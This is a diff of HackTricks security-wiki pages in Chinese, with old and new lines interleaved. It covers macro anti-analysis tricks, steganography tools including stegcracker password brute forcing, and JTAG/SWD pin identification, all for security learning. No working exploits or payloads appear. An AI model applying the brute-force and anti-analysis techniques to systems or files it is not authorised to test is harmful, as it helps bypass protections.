学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
### 无用代码
### 垃圾代码
很常见的是找到**永远不会被使用的无用代码**,以使宏的逆向工程变得更加困难。\
例如,在下面的图片中您可以看到一个永远不会为真的If语句被用来执行一些无用的代码。
很常见会发现 **从未使用的垃圾代码**,以使宏的反向工程更加困难。\
例如,在下面的图像中,你可以看到一个永远不会为真的 If 被用来执行一些垃圾和无用的代码。
![](<../.gitbook/assets/image (369).png>)
### 宏表单
使用**GetObject**函数可以从宏的表单中获取数据。这可以用来增加分析的难度。以下是一个用于**在文本框中隐藏数据**的宏表单的照片(一个文本框可以隐藏其他文本框):
使用 **GetObject** 函数可以从宏的表单中获取数据。这可以用来增加分析的难度。以下是一个宏表单的照片,用于 **在文本框内隐藏数据**(一个文本框可以隐藏其他文本框):
![](<../.gitbook/assets/image (344).png>)
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,18 +1,19 @@
# 隐写术技巧
# Stego Tricks
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
**Try Hard Security Group**
@ -26,7 +27,7 @@
### **Binwalk**
用于搜索二进制文件中嵌入的隐藏文件和数据的工具。通过`apt`安装,其源代码可在[GitHub](https://github.com/ReFirmLabs/binwalk)上找到
一个用于搜索二进制文件中嵌入的隐藏文件和数据的工具。它通过 `apt` 安装,源代码可在 [GitHub](https://github.com/ReFirmLabs/binwalk) 上获取
```bash
binwalk file # Displays the embedded data
binwalk -e file # Extracts the data
@ -34,25 +35,25 @@ binwalk --dd ".*" file # Extracts all data
```
### **Foremost**
根据文件的头部和尾部恢复文件,对于 png 图像非常有用。通过 `apt` 安装,其源代码位于 [GitHub](https://github.com/korczis/foremost)
根据文件的头部和尾部恢复文件,对png图像非常有用。通过`apt`安装,源代码在[GitHub](https://github.com/korczis/foremost)上
```bash
foremost -i file # Extracts data
```
### **Exiftool**
帮助查看文件元数据,可在[这里](https://www.sno.phy.queensu.ca/\~phil/exiftool/)找到
帮助查看文件元数据,访问 [这里](https://www.sno.phy.queensu.ca/\~phil/exiftool/)
```bash
exiftool file # Shows the metadata
```
### **Exiv2**
类似于exiftool用于查看元数据。可通过`apt`安装,在[GitHub](https://github.com/Exiv2/exiv2)上找到源代码,并有一个[官方网站](http://www.exiv2.org/)。
类似于 exiftool用于元数据查看。可通过 `apt` 安装,源代码 [GitHub](https://github.com/Exiv2/exiv2),并有一个 [官方网站](http://www.exiv2.org/)。
```bash
exiv2 file # Shows the metadata
```
### **文件**
确定你正在处理的文件类型。
识别您正在处理的文件类型。
### **字符串**
@ -68,9 +69,9 @@ strings -e b -n 6 file # 16bit strings (big-endian)
strings -e L -n 6 file # 32bit strings (little-endian)
strings -e B -n 6 file # 32bit strings (big-endian)
```
### **比较cmp**
### **比较 (cmp)**
用于将修改的文件与在线找到的原始版本进行比较。
用于将修改的文件与在线找到的原始版本进行比较。
```bash
cmp original.jpg stego.jpg -b -l
```
@ -78,13 +79,13 @@ cmp original.jpg stego.jpg -b -l
### **空格中的隐藏数据**
在看似空白的空格中,可能隐藏着看不见的字符,其中可能包含信息。要提取这些数据,请访问 [https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder](https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder)。
看似空白的空间中的不可见字符可能隐藏着信息。要提取这些数据,请访问 [https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder](https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder)。
## **从图像中提取数据**
### **使用GraphicMagick识别图像细节**
### **使用 GraphicMagick 识别图像细节**
[GraphicMagick](https://imagemagick.org/script/download.php) 用于确定图像文件类型并识别潜在的损坏。执行以下命令来检查一个图像:
[GraphicMagick](https://imagemagick.org/script/download.php) 用于确定图像文件类型并识别潜在的损坏。执行以下命令以检查图像:
```bash
./magick identify -verbose stego.jpg
```
@ -94,86 +95,86 @@ cmp original.jpg stego.jpg -b -l
```
### **Steghide用于数据隐藏**
Steghide便于在`JPEG、BMP、WAV和AU`文件中隐藏数据,能够嵌入和提取加密数据。使用`apt`进行安装很简单,其[源代码可在GitHub上找到](https://github.com/StefanoDeVuono/steghide)。
Steghide 方便地在 `JPEG, BMP, WAV, 和 AU` 文件中隐藏数据,能够嵌入和提取加密数据。使用 `apt` 安装非常简单,其 [源代码可在GitHub上获取](https://github.com/StefanoDeVuono/steghide)。
**命令:**
**命令**
* `steghide info file` 用于查看文件是否包含隐藏数据。
* `steghide extract -sf file [--passphrase password]` 用于提取隐藏数据,密码可选。
* `steghide info file` 显示文件是否包含隐藏数据。
* `steghide extract -sf file [--passphrase password]` 提取隐藏数据,密码可选。
要进行基于Web的提取请访问[此网站](https://futureboy.us/stegano/decinput.html)。
要进行基于网页的提取,请访问 [此网站](https://futureboy.us/stegano/decinput.html)。
**使用Stegcracker进行暴力破解攻击:**
**使用Stegcracker进行暴力破解攻击**
* 要尝试对Steghide进行密码破解请使用[stegcracker](https://github.com/Paradoxis/StegCracker.git)如下:
* 要尝试对Steghide进行密码破解请使用 [stegcracker](https://github.com/Paradoxis/StegCracker.git) 如下:
```bash
stegcracker <file> [<wordlist>]
```
### **zsteg 用于 PNG 和 BMP 文件**
### **zsteg for PNG and BMP Files**
zsteg 专门用于揭示 PNG 和 BMP 文件中的隐藏数据。通过 `gem install zsteg` 进行安装,其[源代码在 GitHub 上](https://github.com/zed-0xff/zsteg)。
zsteg 专注于揭示 PNG 和 BMP 文件中的隐藏数据。安装通过 `gem install zsteg` 完成,其 [源代码在 GitHub](https://github.com/zed-0xff/zsteg)。
**命令:**
**Commands:**
* `zsteg -a file` 在文件上应用所有检测方法。
* `zsteg -a file` 对文件应用所有检测方法。
* `zsteg -E file` 指定用于数据提取的有效载荷。
### **StegoVeritas Stegsolve**
### **StegoVeritas and Stegsolve**
**stegoVeritas** 检查元数据,执行图像转换,并应用 LSB 强制破解等其他功能。使用 `stegoveritas.py -h` 查看所有选项的完整列表,使用 `stegoveritas.py stego.jpg` 执行所有检查。
**stegoVeritas** 检查元数据,执行图像转换,并应用 LSB 暴力破解等功能。使用 `stegoveritas.py -h` 获取完整选项列表,使用 `stegoveritas.py stego.jpg` 执行所有检查。
**Stegsolve** 应用各种颜色滤镜来显示图像中隐藏的文本或消息。可在[GitHub](https://github.com/eugenekolo/sec-tools/tree/master/stego/stegsolve/stegsolve)上找到
**Stegsolve** 应用各种颜色滤镜以揭示图像中的隐藏文本或消息。它可在 [GitHub](https://github.com/eugenekolo/sec-tools/tree/master/stego/stegsolve/stegsolve) 上获取
### **FFT 用于隐藏内容检测**
### **FFT for Hidden Content Detection**
快速傅里叶变换FFT技术可以揭示图像中隐藏的内容。有用的资源包括:
快速傅里叶变换 (FFT) 技术可以揭示图像中的隐蔽内容。有用的资源包括:
* [EPFL 演示](http://bigwww.epfl.ch/demo/ip/demos/FFT/)
* [EPFL Demo](http://bigwww.epfl.ch/demo/ip/demos/FFT/)
* [Ejectamenta](https://www.ejectamenta.com/Fourifier-fullscreen/)
* [GitHub 上的 FFTStegPic](https://github.com/0xcomposure/FFTStegPic)
* [FFTStegPic on GitHub](https://github.com/0xcomposure/FFTStegPic)
### **Stegpy 用于音频和图像文件**
### **Stegpy for Audio and Image Files**
Stegpy 允许将信息嵌入图像和音频文件,支持 PNG、BMP、GIF、WebP 和 WAV 等格式。可在[GitHub](https://github.com/dhsdshdhk/stegpy)上找到
Stegpy 允许将信息嵌入图像和音频文件,支持 PNG、BMP、GIF、WebP 和 WAV 等格式。它可在 [GitHub](https://github.com/dhsdshdhk/stegpy) 上获取
### **Pngcheck 用于 PNG 文件分析**
### **Pngcheck for PNG File Analysis**
要分析 PNG 文件或验证其真实性,请使用:
要分析 PNG 文件或验证其真实性,请使用
```bash
apt-get install pngcheck
pngcheck stego.png
```
### **图像分析的附加工具**
### **额外的图像分析工具**
进一步探索,请访问:
进一步探索,请考虑访问:
* [Magic Eye Solver](http://magiceye.ecksdee.co.uk/)
* [Image Error Level Analysis](https://29a.ch/sandbox/2012/imageerrorlevelanalysis/)
* [图像误差级别分析](https://29a.ch/sandbox/2012/imageerrorlevelanalysis/)
* [Outguess](https://github.com/resurrecting-open-source-projects/outguess)
* [OpenStego](https://www.openstego.com/)
* [DIIT](https://diit.sourceforge.net/)
## **从音频中提取数据**
**音频隐写术** 提供了一种在声音文件中隐藏信息的独特方法。不同的工具用于嵌入或检索隐藏内容。
**音频隐写术**提供了一种独特的方法,将信息隐藏在声音文件中。使用不同的工具来嵌入或检索隐藏的内容。
### **Steghide (JPEG, BMP, WAV, AU)**
Steghide 是一个多功能工具,旨在将数据隐藏在 JPEG、BMP、WAV 和 AU 文件中。详细说明请参阅 [stego tricks documentation](stego-tricks.md#steghide)。
Steghide是一个多功能工具旨在将数据隐藏在JPEG、BMP、WAV和AU文件中。详细说明请参见[隐写技巧文档](stego-tricks.md#steghide)。
### **Stegpy (PNG, BMP, GIF, WebP, WAV)**
该工具兼容各种格式,包括 PNG、BMP、GIF、WebP 和 WAV。有关更多信息请参阅 [Stegpy's section](stego-tricks.md#stegpy-png-bmp-gif-webp-wav)。
该工具兼容多种格式包括PNG、BMP、GIF、WebP和WAV。有关更多信息请参阅[Stegpy的部分](stego-tricks.md#stegpy-png-bmp-gif-webp-wav)。
### **ffmpeg**
ffmpeg 对于评估音频文件的完整性至关重要,突出显示详细信息并指出任何差异。
ffmpeg对于评估音频文件的完整性至关重要突出详细信息并指出任何差异。
```bash
ffmpeg -v info -i stego.mp3 -f null -
```
### **WavSteg (WAV)**
WavSteg在使用最低有效位策略在WAV文件中隐藏和提取数据方面表现出色。它可在[GitHub](https://github.com/ragibson/Steganography#WavSteg)上找到。命令包括:
WavSteg 擅长使用最低有效位策略在 WAV 文件中隐藏和提取数据。它可以在 [GitHub](https://github.com/ragibson/Steganography#WavSteg) 上获取。命令包括:
```bash
python3 WavSteg.py -r -b 1 -s soundfile -o outputfile
@ -181,50 +182,53 @@ python3 WavSteg.py -r -b 2 -s soundfile -o outputfile
```
### **Deepsound**
Deepsound允许使用AES-256在声音文件中加密和检测信息。可以从[官方页面](http://jpinsoft.net/deepsound/download.aspx)下载。
Deepsound 允许使用 AES-256 对音频文件中的信息进行加密和检测。可以从 [the official page](http://jpinsoft.net/deepsound/download.aspx) 下载。
### **Sonic Visualizer**
Sonic Visualizer是一个无价的工具,用于对音频文件进行视觉和分析检查,可以揭示其他方法无法检测到的隐藏元素。访问[官方网站](https://www.sonicvisualiser.org/)了解更多信息。
Sonic Visualizer 是一个用于音频文件的视觉和分析检查的宝贵工具,可以揭示其他方法无法检测到的隐藏元素。访问 [official website](https://www.sonicvisualiser.org/) 了解更多信息。
### **DTMF Tones - 拨号音**
### **DTMF Tones - Dial Tones**
可以通过在线工具如[此DTMF检测器](https://unframework.github.io/dtmf-detect/)和[DialABC](http://dialabc.com/sound/detect/index.html)来检测音频文件中的DTMF音调。
通过在线工具,如 [this DTMF detector](https://unframework.github.io/dtmf-detect/) 和 [DialABC](http://dialabc.com/sound/detect/index.html),可以检测音频文件中的 DTMF 音调。
## **其他技术**
## **Other Techniques**
### **二进制长度平方根 - QR码**
### **Binary Length SQRT - QR Code**
平方为整数的二进制数据可能代表一个QR码。使用以下代码片段进行检查:
平方为整数的二进制数据可能表示 QR 码。使用此代码片段进行检查:
```python
import math
math.sqrt(2500) #50
```
For binary to image conversion, check [dcode](https://www.dcode.fr/binary-image). To read QR codes, use [this online barcode reader](https://online-barcode-reader.inliteresearch.com/).
### **盲文翻译**
要进行盲文翻译,请使用[Branah盲文翻译器](https://www.branah.com/braille-translator)这个优秀的资源。
For translating Braille, the [Branah Braille Translator](https://www.branah.com/braille-translator) is an excellent resource.
## **参考资料**
## **参考文献**
* [**https://0xrick.github.io/lists/stego/**](https://0xrick.github.io/lists/stego/)
* [**https://github.com/DominicBreuker/stego-toolkit**](https://github.com/DominicBreuker/stego-toolkit)
**尝试困难安全组**
**Try Hard Security Group**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

View file

@ -1,76 +1,78 @@
# 硬件黑客
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
## JTAG
JTAG允许执行边界扫描。边界扫描分析特定电路,包括每个引脚的嵌入式边界扫描单元和寄存器。
JTAG 允许执行边界扫描。边界扫描分析某些电路,包括每个引脚的嵌入式边界扫描单元和寄存器。
JTAG标准定义了用于进行边界扫描的**特定命令**,包括以下内容:
JTAG 标准定义了 **进行边界扫描的特定命令**,包括以下内容:
* **BYPASS** 允许您在不经过其他芯片的开销的情况下测试特定芯片
* **SAMPLE/PRELOAD** 在设备处于正常工作模式时,获取进入和离开设备的数据样本。
* **BYPASS** 允许您测试特定芯片,而无需通过其他芯片的开销
* **SAMPLE/PRELOAD** 在设备正常工作模式下获取进入和离开设备的数据样本。
* **EXTEST** 设置和读取引脚状态。
它还可以支持其他命令,例如:
* **IDCODE** 用于识别设备
* **INTEST** 用于对设备进行内部测试
* **INTEST** 用于设备的内部测试
当您使用类似JTAGulator的工具时可能会遇到这些指令。
当您使用像 JTAGulator 这样的工具时,可能会遇到这些指令。
### 测试访问端口
边界扫描包括对四线**测试访问端口TAP**的测试这是一个通用端口提供了内置在组件中的JTAG测试支持功能的**访问**。TAP使用以下五个信号:
边界扫描包括四线 **测试访问端口 (TAP)** 的测试,这是一个通用端口,提供 **对 JTAG 测试支持** 功能的访问。TAP 使用以下五个信号:
* 测试时钟输入**TCK**TCK是定义TAP控制器将多久执行一次操作换句话说在状态机中跳转到下一个状态的**时钟**
* 测试模式选择**TMS**输入TMS控制**有限状态机**。在每个时钟节拍中设备的JTAG TAP控制器会检查TMS引脚上的电压。如果电压低于某个阈值则信号被视为低并解释为0而如果电压高于某个阈值则信号被视为高并解释为1。
* 测试数据输入**TDI**TDI是通过扫描单元将数据发送到芯片的引脚。每个供应商负责定义通过此引脚的通信协议因为JTAG不定义此协议
* 测试数据输出**TDO**TDO是将数据从芯片发送出去的引脚。
* 测试复位**TRST**输入可选的TRST将有限状态机重置到已知的良好状态。或者如果TMS保持在1状态五个连续的时钟周期它会调用一个重置就像TRST引脚一样这就是为什么TRST是可选的
* 测试时钟输入 (**TCK**) TCK 是定义 TAP 控制器将执行单个操作的频率的 **时钟**(换句话说,跳转到状态机中的下一个状态)
* 测试模式选择 (**TMS**) 输入 TMS 控制 **有限状态机**。在每个时钟脉冲上,设备的 JTAG TAP 控制器检查 TMS 引脚上的电压。如果电压低于某个阈值,则信号被视为低并解释为 0而如果电压高于某个阈值则信号被视为高并解释为 1。
* 测试数据输入 (**TDI**) TDI 是通过扫描单元将 **数据发送到芯片** 的引脚。每个供应商负责定义通过此引脚的通信协议,因为 JTAG 并未定义此内容
* 测试数据输出 (**TDO**) TDO 是将 **数据从芯片发送出去** 的引脚。
* 测试复位 (**TRST**) 输入 可选的 TRST 将有限状态机 **重置为已知良好状态**。或者,如果 TMS 在连续五个时钟周期内保持为 1则会调用复位方式与 TRST 引脚相同,这就是 TRST 是可选的原因
有时您可以在PCB上找到标记这些引脚的情况。在其他情况下您可能需要**找到它们**
有时您可以在 PCB 上找到标记的引脚。在其他情况下,您可能需要 **找到它们**
### 识别JTAG引脚
### 识别 JTAG 引脚
检测JTAG端口的最快但最昂贵的方法是使用**JTAGulator**,这是专门为此目的创建的设备(尽管它也可以**检测UART引脚布局**)。
检测 JTAG 端口的最快但最昂贵的方法是使用 **JTAGulator**,这是一种专门为此目的创建的设备(尽管它也 **可以检测 UART 引脚**)。
它有**24个通道**,您可以连接到板上的引脚。然后,它对所有可能的组合执行**BF攻击**,发送**IDCODE**和**BYPASS**边界扫描命令。如果收到响应,它会显示每个JTAG信号对应的通道。
它有 **24 个通道**,您可以将其连接到电路板引脚。然后,它执行所有可能组合的 **BF 攻击**,发送 **IDCODE****BYPASS** 边界扫描命令。如果收到响应,它会显示每个 JTAG 信号对应的通道。
识别JTAG引脚的一种更便宜但速度较慢的方法是使用加载在兼容Arduino微控制器上的[JTAGenum](https://github.com/cyphunk/JTAGenum/)
识别 JTAG 引脚的更便宜但速度较慢的方法是使用 [**JTAGenum**](https://github.com/cyphunk/JTAGenum/) 加载在 Arduino 兼容的微控制器上
使用**JTAGenum**,您首先需要**定义用于枚举的探测设备的引脚**。您需要参考设备的引脚图,然后将这些引脚与目标设备上的测试点连接起来
使用 **JTAGenum**,您首先需要 **定义您将用于枚举的探测设备的引脚**。您需要参考设备的引脚图,然后将这些引脚与目标设备上的测试点连接。
通过**检查PCB**以找到其中一个引脚布局是识别JTAG引脚的第三种方法。在某些情况下PCB可能会方便地提供**Tag-Connect接口**这清楚地表明该板有一个JTAG连接器。您可以在[https://www.tag-connect.com/info/](https://www.tag-connect.com/info/)上查看该接口的外观。此外检查PCB上芯片组的**数据表**可能会显示指向JTAG接口的引脚布局图。
识别 JTAG 引脚的 **第三种方法** 是通过 **检查 PCB** 中的引脚图。在某些情况下PCB 可能方便地提供 **Tag-Connect 接口**,这清楚地表明该电路板也具有 JTAG 连接器。您可以在 [https://www.tag-connect.com/info/](https://www.tag-connect.com/info/) 查看该接口的外观。此外,检查 PCB 上芯片组的 **数据手册** 可能会揭示指向 JTAG 接口的引脚图。
## SDW
SWD是一种专为ARM设计的调试协议。
SWD 是一种专为调试设计的 ARM 特定协议。
SWD接口需要**两个引脚**:一个双向**SWDIO**信号相当于JTAG的**TDI和TDO引脚和一个时钟**,即**SWCLK**相当于JTAG中的**TCK**。许多设备支持**串行线或JTAG调试端口SWJ-DP**这是一个结合了JTAG和SWD接口的接口使您可以将SWD或JTAG探针连接到目标设备。
SWD 接口需要 **两个引脚**:一个双向的 **SWDIO** 信号,相当于 JTAG 的 **TDI 和 TDO 引脚**,以及一个时钟 **SWCLK**,相当于 JTAG 中的 **TCK**。许多设备支持 **串行线或 JTAG 调试端口 (SWJ-DP)**,这是一个结合了 JTAG 和 SWD 接口的接口,使您能够将 SWD 或 JTAG 探头连接到目标。
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
